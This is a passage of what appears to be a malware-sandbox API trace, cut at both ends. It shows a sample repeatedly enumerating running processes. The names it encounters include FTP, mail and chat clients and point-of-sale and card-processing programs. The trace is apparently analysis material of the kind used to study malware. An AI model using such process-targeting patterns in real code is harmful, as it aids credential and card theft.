th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0211.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0211.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0211.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0211.745] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0211.748] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0211.750] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0211.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0211.790] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0211.793] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0211.795] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0211.797] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0211.799] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0211.801] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0211.803] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0211.805] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0211.807] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0211.809] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0211.821] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0211.823] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0211.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0211.829] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0211.832] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0211.833] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0211.836] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0211.837] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0211.877] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0211.879] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0211.882] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0211.883] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0211.885] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0211.887] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0211.889] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0211.891] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.892] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0211.894] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0211.896] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.898] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0211.900] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0211.901] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.903] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0211.905] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0211.907] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0211.908] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0211.910] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0211.951] CloseHandle (hObject=0x1eb8) returned 1 [0211.951] Sleep (dwMilliseconds=0x64) [0211.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0212.048] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.050] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.051] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.053] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.055] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.056] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.058] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.059] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.061] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.062] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.064] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.066] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.105] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.107] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.108] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.111] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.113] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.115] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.116] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0212.119] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0212.161] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0212.163] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.164] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0212.166] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0212.167] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0212.169] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0212.171] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0212.173] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0212.175] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.176] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.234] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0212.239] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0212.241] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.243] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.245] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0212.247] Process32Next (in: 